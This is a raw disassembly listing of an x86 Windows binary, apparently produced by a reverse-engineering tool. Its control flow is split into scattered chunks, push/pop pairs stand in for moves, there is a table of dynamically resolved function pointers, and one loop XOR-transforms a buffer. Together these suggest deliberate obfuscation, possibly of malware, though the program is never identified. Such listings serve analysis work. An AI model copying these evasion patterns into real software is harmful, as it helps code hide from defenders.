loc_9B1568: ; CODE XREF: sub_9AC6DC+5DFC�j
; sub_9AC6DC:loc_9B3A68�j
push dword_9BBD20
pop eax
add eax, 5
cmp eax, 64h
jle loc_9B004C
jmp loc_9AC350
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1584 proc near ; CODE XREF: StartAddress+DC�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AD087 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009AE3C4 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009AEE10 SIZE 0000002F BYTES
; FUNCTION CHUNK AT 009AF938 SIZE 0000000C BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B99E0
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_18], esp
mov [ebp+var_1C], ebx
mov [ebp+var_4], ebx
push dword_9BCB74
pop eax
push dword ptr [eax+14h]
pop ecx
push off_9B98C1
call dword ptr [ecx+0Ch]
add esp, 4
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
call dword ptr [eax+30h]
mov dword_9BCB94, eax
mov dword_9BCB98, ebx
mov ecx, 140h
sub eax, eax
mov edi, off_9BA180
rep stosd
mov ecx, off_9B9844
call sub_9B5480
mov ecx, 1
call sub_9B4610
sub esi, esi
loc_9B1609: ; CODE XREF: sub_9B1584-1C45�j
mov [ebp+var_20], esi
cmp esi, 40h
jge loc_9AEE10
jmp off_9B9DF7
sub_9B1584 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B161C proc near ; CODE XREF: sub_9B161C+EA�j
; sub_9B5300+13�j
; DATA XREF: ...
var_4 = dword ptr -4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 009AB904 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009AC93C SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009B16EC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B1700 SIZE 00000012 BYTES
push ebp
push edi
push 10h
pop eax
call sub_9AC32C
test al, 3
jnz loc_9ABA03
jmp loc_9B16EC
sub_9B161C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AD97C
loc_9B1634: ; CODE XREF: sub_9AD97C-17E5�j
; DATA XREF: .text:off_9BAADC�o
push dword_9BCB74
pop ecx
mov edx, [ecx+0Ch]
push eax
call dword ptr [edx+14h]
jmp loc_9B454B
; END OF FUNCTION CHUNK FOR sub_9AD97C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B1648 proc near ; CODE XREF: sub_9B2160+388A�j
; DATA XREF: .text:off_9BA170�o
push ebx
pop ecx
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
sub_9B1648 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_9B2160
loc_9B165A: ; CODE XREF: sub_9B2160+3884�j
push dword ptr [esi+44h]
pop eax
or eax, eax
jz loc_9B2434
jmp loc_9B03B4
; END OF FUNCTION CHUNK FOR sub_9B2160
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B174C
loc_9B166F: ; CODE XREF: sub_9B174C-60D0�j
; sub_9B174C-403�j ...
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, dword_9BCB74
mov edx, [ecx]
push off_9BADC8
call dword ptr [edx+1Ch]
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_9B174C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B169C: ; CODE XREF: sub_9B1A08+1D79�j
; DATA XREF: .text:off_9B9280�o
lea edx, [ebp+var_402C]
push edx
push eax
lea eax, [ebp+var_201C]
push eax
mov esi, [ebp+var_41E4]
sub eax, eax
call sub_9B3F28
mov [ebp+var_4200], eax
loc_9B16BE: ; CODE XREF: sub_9B1A08-205E�j
; sub_9B1A08-1340�j ...
push 2000h
lea ecx, [ebp+var_401C]
push ecx
sub eax, eax
lea ecx, [ebp+var_403C]
lea ebx, [ebp+var_4208]
mov edi, [ebp+var_41E4]
call sub_9B0734
jmp off_9B9240
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B161C
loc_9B16EC: ; CODE XREF: sub_9B161C+12�j
push [esp+14h+var_4]
pop eax
cmp esi, eax
jg loc_9AC93E
jmp off_9B962E
; END OF FUNCTION CHUNK FOR sub_9B161C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B161C
loc_9B1700: ; CODE XREF: sub_9B161C-4CC5�j
; DATA XREF: .text:off_9BA98A�o
sub esi, eax
add ebx, eax
test esi, esi
jg sub_9B161C
jmp off_9BAB5A
; END OF FUNCTION CHUNK FOR sub_9B161C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B1714: ; CODE XREF: sub_9B0930-5706�j
push off_9B9530
push dword ptr [eax+0Ch]
pop eax
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
mov ecx, [edx+0Ch]
mov [ecx+4], eax
mov edx, dword_9BCB74
push dword ptr [edx+0Ch]
pop eax
push dword ptr [eax+4]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp loc_9AB5D8
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B174C proc near ; CODE XREF: sub_9B1D80-55F3�p
; sub_9B3864-11A5�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 009AB650 SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009B1344 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B166F SIZE 0000002C BYTES
; FUNCTION CHUNK AT 009B24A4 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 009B3F98 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B54E8 SIZE 00000040 BYTES
; FUNCTION CHUNK AT 009B5DA0 SIZE 00000007 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BA3F4
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov esi, edx
mov ebx, ecx
mov [ebp+var_18], esp
push [ebp+arg_0]
pop edi
mov eax, dword_9BCB74
mov ecx, [eax]
push off_9BADC8
call dword ptr [ecx+18h]
mov [ebp+var_4], 0
mov dword ptr [esi], 0
push dword_9BBE3C
pop eax
or eax, eax
jz loc_9B166F
jmp off_9BA43F
sub_9B174C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B17B0: ; CODE XREF: sub_9B1A08-2957�j
mov edx, dword_9BCB74
mov ecx, [edx+10h]
push eax
call dword ptr [ecx+38h]
mov [ebp+var_41E4], 0FFFFFFFFh
loc_9B17C7: ; CODE XREF: sub_9B1A08-295D�j
; sub_9B1A08+9AC�j ...
xor edi, edi
mov [ebp+var_41E8], edi
mov ebx, [ebp+var_41E0]
loc_9B17D5: ; CODE XREF: sub_9B1A08-2066�j
cmp edi, ebx
jnb loc_9AE008
jmp off_9B93A7
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3D1C
loc_9B17E4: ; CODE XREF: sub_9B3D1C+F8E�j
; DATA XREF: .text:off_9BA0B9�o
push dword ptr [ebx]
pop ecx
mov edi, [eax+44h]
push ecx
pop edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
loc_9B17F8: ; CODE XREF: sub_9B3D1C+F88�j
push dword ptr [ebx+48h]
pop esi
test esi, esi
jz loc_9B1464
jmp off_9BA4DD
; END OF FUNCTION CHUNK FOR sub_9B3D1C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B6370
loc_9B180C: ; CODE XREF: sub_9B6370-5�j
or edi, edx
mov edx, edi
movzx edi, byte ptr [esi]
xor eax, edi
mov [esi], al
xor eax, edi
add ecx, eax
adc edx, 0
inc esi
dec ebx
jnz loc_9B6357
jmp off_9BACB6
; END OF FUNCTION CHUNK FOR sub_9B6370
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9B182C: ; CODE XREF: sub_9AC6DC+35AE�j
; DATA XREF: .text:off_9B97FA�o
mov ecx, 64h
loc_9B1831: ; CODE XREF: sub_9AC6DC+35A8�j
mov dword_9BBD20, ecx
jmp loc_9B0058
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9B183C: ; CODE XREF: sub_9B649C-31F5�j
; DATA XREF: .text:off_9BAA09�o
add eax, 4
mov [ebp+var_1C], eax
loc_9B1842: ; CODE XREF: sub_9B649C-31FB�j
test bl, 20h
jz loc_9AEA06
jmp loc_9AEA00
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B1850: ; CODE XREF: sub_9B63D8-7046�j
push 400h
pop eax
loc_9B1856: ; CODE XREF: sub_9B63D8-704C�j
push eax
lea edx, [ebx+ebp-2120h]
push edx
lea edi, [ebp-2148h]
push dword ptr [ebp-2138h]
pop esi
mov eax, 0Ah
call sub_9B0D34
mov [ebp-2174h], eax
cmp eax, 4
jnz loc_9AF94B
jmp loc_9AD634
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B188C: ; CODE XREF: sub_9B0930-2575�j
; DATA XREF: .text:off_9BAF67�o
push off_9B92F0
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
mov ecx, [edx]
mov [ecx+10h], eax
push dword_9BCB74
pop edx
mov eax, [edx]
mov ecx, [eax+10h]
test ecx, ecx
jz loc_9B23EF
jmp loc_9B505C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AD3EC
loc_9B18BC: ; CODE XREF: sub_9AD3EC+20D1�j
; DATA XREF: .text:off_9B8C68�o
shr ebx, 1Fh
shl ebx, cl
or edi, ebx
mov [esi], edi
inc edx
jmp loc_9AD42D
; END OF FUNCTION CHUNK FOR sub_9AD3EC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFB1C
loc_9B18CC: ; CODE XREF: sub_9AFB1C-2D53�j
push dword ptr [edi+eax]
pop edx
add eax, 4
mov [esi+14h], edx
mov [ebp-1Ch], eax
loc_9B18D9: ; CODE XREF: sub_9AFB1C-2D59�j
test bl, 40h
jz loc_9B02CB
jmp loc_9B3B9C
; END OF FUNCTION CHUNK FOR sub_9AFB1C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9B18E8: ; CODE XREF: sub_9B04A8-2F73�j
test bl, 4
jz loc_9AFD43
jmp loc_9B01B8
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B18F8 proc near ; CODE XREF: sub_9B3A74-8BF5�p
; sub_9B3408-62A9�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 009B0B14 SIZE 00000020 BYTES
push esi
mov esi, eax
push edi
xor eax, eax
push esi
pop edi
mov ecx, 40h
rep stosd
stosw
xor eax, eax
loc_9B190B: ; CODE XREF: sub_9B18F8+1D�j
mov [eax+esi+2], al
inc eax
cmp eax, 100h
jl short loc_9B190B
jmp off_9B970F
sub_9B18F8 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1B20
loc_9B1920: ; CODE XREF: sub_9B1B20-2BAB�j
mov [ebp+var_330], 1
loc_9B192A: ; CODE XREF: sub_9B1B20-2BB1�j
push dword_9BCB74
pop eax
push dword ptr [eax+0Ch]
pop ecx
mov edx, [ebp+var_32C]
push edx
call dword ptr [ecx+14h]
loc_9B193F: ; CODE XREF: sub_9B1B20-5938�j
mov eax, esi
call sub_9AC448
jmp loc_9B0A27
; END OF FUNCTION CHUNK FOR sub_9B1B20
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B194C: ; CODE XREF: sub_9B4950-8E0C�j
mov dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_9B42AC
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B195C: ; CODE XREF: sub_9B1D80-32DA�j
; DATA XREF: .text:off_9BA82C�o
sub ecx, ecx
movzx esi, word ptr [ebp-2022h]
mov cl, [ebp-2024h]
and ecx, 1
push ecx
mov edx, [ebp-2020h]
push edx
push ebx
push eax
push esi
pop ecx
call sub_9AF030
or eax, eax
jz loc_9B3EC4
jmp loc_9B0CD4
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B198C: ; CODE XREF: sub_9B3864+91�j
call sub_9B36E8
push eax
pop ebx
mov [ebp+var_2064], ebx
push [ebp+var_202C]
pop eax
push ebx
pop ecx
and eax, 7FFFFFFFh
and ecx, 7FFFFFFFh
cmp ecx, eax
jbe loc_9ACC3C
jmp loc_9B52B8
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0D34
loc_9B19BC: ; CODE XREF: sub_9B0D34-146B�j
mov eax, 1
retn 8
; END OF FUNCTION CHUNK FOR sub_9B0D34
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9B19C4: ; CODE XREF: sub_9AF030+1BD4�j
; DATA XREF: .text:off_9BA677�o
mov [ebp+var_20], 1
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_9AE8BD
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B19D8 proc near ; CODE XREF: sub_9ACA48+93BB�j
; DATA XREF: .text:off_9B97C5�o
; FUNCTION CHUNK AT 009ADF64 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B349C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B4B5C SIZE 0000004B BYTES
push ebx
lea eax, [ebp-405Ch]
push eax
push 2002h
lea ecx, [ebp-2020h]
push ecx
mov ebx, esi
call sub_9ABD30
mov [ebp-4054h], eax
cmp eax, 4
jnz loc_9B5E0C
jmp loc_9ADF64
sub_9B19D8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1A08 proc near ; DATA XREF: .text:off_9BA7C1�o
var_43B4 = dword ptr -43B4h
var_4224 = word ptr -4224h
var_4214 = dword ptr -4214h
var_4210 = dword ptr -4210h
var_420C = dword ptr -420Ch
var_4208 = dword ptr -4208h
var_4204 = dword ptr -4204h
var_4200 = dword ptr -4200h
var_41FC = dword ptr -41FCh
var_41F8 = dword ptr -41F8h
var_41F4 = dword ptr -41F4h
var_41F0 = dword ptr -41F0h
var_41EC = dword ptr -41ECh
var_41E8 = dword ptr -41E8h
var_41E4 = dword ptr -41E4h
var_41E0 = dword ptr -41E0h
var_41DC = word ptr -41DCh
var_41DA = byte ptr -41DAh
var_41BC = dword ptr -41BCh
var_404C = byte ptr -404Ch
var_403C = dword ptr -403Ch
var_4038 = dword ptr -4038h
var_4034 = dword ptr -4034h
var_4030 = dword ptr -4030h
var_402C = dword ptr -402Ch
var_4028 = dword ptr -4028h
var_4024 = dword ptr -4024h
var_4020 = dword ptr -4020h
var_401C = byte ptr -401Ch
var_201C = byte ptr -201Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 009AB158 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009AB698 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009AB8B0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AC380 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009AD1C4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009AD46C SIZE 0000002C BYTES
; FUNCTION CHUNK AT 009AD5C8 SIZE 0000006A BYTES
; FUNCTION CHUNK AT 009AD788 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009AD898 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009ADB90 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 009ADCA0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009ADD4C SIZE 00000054 BYTES
; FUNCTION CHUNK AT 009AE008 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 009AE1D8 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 009AE344 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009AE804 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009AE954 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009AE988 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009AEEE8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009AF0A8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009AF110 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009AF398 SIZE 00000037 BYTES
; FUNCTION CHUNK AT 009AF780 SIZE 00000085 BYTES
; FUNCTION CHUNK AT 009AF990 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009AF9A8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B06A4 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009B11B4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B169C SIZE 0000004D BYTES
; FUNCTION CHUNK AT 009B17B0 SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009B1C13 SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009B2398 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 009B2C5C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B351C SIZE 0000003E BYTES
; FUNCTION CHUNK AT 009B3778 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B4444 SIZE 0000003A BYTES
; FUNCTION CHUNK AT 009B47A0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B48CC SIZE 00000025 BYTES
; FUNCTION CHUNK AT 009B4C3C SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009B4C68 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 009B525C SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009B5444 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B59A0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B59F0 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 009B606C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009B61E4 SIZE 00000012 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B90D9
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 8
mov eax, 439Ch
call __alloca_probe
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
push ebx
push esi
push edi
mov [ebp+var_18], esp
push [ebp+arg_0]
pop esi
mov [ebp+var_41F4], esi
mov eax, [esi+0Ch]
mov [ebp+var_41EC], eax
sub edx, edx
mov ecx, 63h
mov [ebp+var_4], edx
mov [ebp+var_41F0], edx
xor eax, eax
mov [ebp+var_41E4], 0FFFFFFFFh
mov [ebp+var_41DC], dx
lea edi, [ebp+var_41DA]
rep stosd
stosw
mov [ebp+var_41E0], edx
mov [ebp+var_4204], edx
loc_9B1A92: ; CODE XREF: sub_9B1A08-39DD�j
push [ebp+var_41EC]
pop edx
neg edx
sbb edx, edx
and edx, 0FA0h
add edx, 3E8h
push esi
call sub_9B5CDC
and eax, eax
jnz loc_9ADD8C
jmp loc_9B2398
sub_9B1A08 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B1ABC: ; CODE XREF: sub_9B1F68-2B4�j
; DATA XREF: .text:off_9BAC63�o
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_9B01DB
jmp off_9B8A0A
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9B1AD3: ; CODE XREF: sub_9ACEE8+80�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push 0
call dword ptr [eax+60h]
push dword ptr [ebp-10h]
pop ecx
xor eax, eax
mov large fs:0, ecx
pop edi
pop esi
pop ebx
push dword ptr [ebp-1Ch]
pop ecx
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B1B0C: ; CODE XREF: sub_9B0930+516�j
push dword ptr [edx]
pop eax
mov ecx, [eax+78h]
test ecx, ecx
jz loc_9B23EF
jmp off_9B8E38
; END OF FUNCTION CHUNK FOR sub_9B0930
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1B20 proc near ; CODE XREF: sub_9B174C-60E6�p
; sub_9AF25C-33FD�p ...
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = byte ptr -328h
var_224 = byte ptr -224h
var_120 = byte ptr -120h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 009ABC4C SIZE 00000038 BYTES
; FUNCTION CHUNK AT 009AC1A0 SIZE 00000053 BYTES
; FUNCTION CHUNK AT 009AEF4C SIZE 0000002E BYTES
; FUNCTION CHUNK AT 009B0A27 SIZE 0000003C BYTES
; FUNCTION CHUNK AT 009B0DB0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009B1920 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 009B323C SIZE 0000002F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BABEB
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 324h
push dword_9B8788
pop eax
xor eax, ebp
mov [ebp+var_1C], eax
push ebx
push esi
push edi
push ecx
pop edi
sub esi, esi
mov [ebp+var_18], esp
mov [ebp+var_330], esi
mov ebx, edx
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BA97F
call dword ptr [ecx+18h]
mov [ebp+var_4], esi
lea edx, [ebp+var_224]
push edx
push 3
call sub_9B6078
add esp, 8
lea eax, [ebp+var_120]
push eax
mov ecx, [ebp+arg_0]
push ecx
lea ecx, [ebp+var_328]
call sub_9ABC20
lea eax, [edi+1]
call sub_9AF3E8
mov esi, eax
mov [ebp+var_334], esi
test esi, esi
jz loc_9B0A27
jmp off_9BACE4
sub_9B1B20 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B1BC0: ; CODE XREF: sub_9B0930-4813�j
; DATA XREF: .text:off_9B96B7�o
push off_9BAFA7
push dword ptr [eax]
pop eax
push eax
call esi
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
mov [edx+8Ch], eax
mov eax, dword_9BCB74
mov eax, [eax]
push dword ptr [eax+8Ch]
pop ecx
or ecx, ecx
jz loc_9B23EF
jmp off_9BB04C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B1BF8: ; CODE XREF: sub_9ADAC4+73FC�j
; DATA XREF: .text:off_9B970B�o
cmp ebx, 0FFFFFFFFh
jz loc_9AB8EE
jmp off_9B93AB
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9B1C08: ; CODE XREF: sub_9ADDA4+532D�j
jmp off_9B2B18[edi*4]
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B1C13: ; CODE XREF: sub_9B1A08+3252�j
mov [ebp+var_4], 0FFFFFFFFh
push dword_9BCB74
pop ecx
mov edx, [ecx]
push 0
call dword ptr [edx+60h]
mov ecx, [ebp+var_10]
xor eax, eax
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0FD0
loc_9B1C48: ; CODE XREF: sub_9B0FD0+56�j
; DATA XREF: .text:off_9B89C6�o
cmp dword_9BCBCC[eax*4], esi
jnz loc_9AFCB4
jmp off_9BAF5F
; END OF FUNCTION CHUNK FOR sub_9B0FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B1C5C: ; CODE XREF: sub_9B0930+4217�j
push off_9B9346
mov eax, [eax]
push eax
call esi
push dword_9BCB74
pop ecx
mov edx, [ecx+10h]
mov [edx+44h], eax
mov eax, dword_9BCB74
mov eax, [eax+10h]
push dword ptr [eax+44h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp loc_9AE150
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B6504
loc_9B1C93: ; CODE XREF: sub_9B6504-9024�j
; sub_9B6504-4518�j ...
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B6504
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B1CAC: ; CODE XREF: sub_9B1F68-215A�j
; DATA XREF: .text:off_9BA8B1�o
or eax, eax
jz loc_9B01DB
jmp off_9BAC63
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B31A8
loc_9B1CBF: ; CODE XREF: sub_9B31A8-2926�j
; sub_9B31A8+36�j ...
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_1C]
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B31A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9B1CDC: ; CODE XREF: sub_9B04A8-325C�j
inc dword ptr [ebp-4040h]
jmp loc_9AD52E
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B1CE8: ; CODE XREF: sub_9B0930+2FF8�j
; DATA XREF: .text:off_9BAB98�o
push off_9B9A6A
mov eax, [eax]
push eax
call esi
push dword_9BCB74
pop ecx
mov edx, [ecx+0Ch]
mov [edx+18h], eax
push dword_9BCB74
pop eax
mov eax, [eax+0Ch]
push dword ptr [eax+18h]
pop ecx
and ecx, ecx
jz loc_9B23EF
jmp loc_9AE490
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B1D1C: ; CODE XREF: sub_9B63D8-B308�j
mov dl, [ebp-2116h]
cmp dl, 30h
jl loc_9AF944
jmp loc_9AFEF0
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AEBB8
loc_9B1D30: ; CODE XREF: sub_9AEBB8+5B�j
; sub_9B5228+2E�j
; DATA XREF: ...
mov [ebp-124h], ebx
jmp loc_9ABDE3
; END OF FUNCTION CHUNK FOR sub_9AEBB8
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B3B1C
loc_9B1D3F: ; CODE XREF: sub_9B3B1C-7A38�j
; sub_9B3B1C-2747�j
mov [ebp+var_4], 0FFFFFFFFh
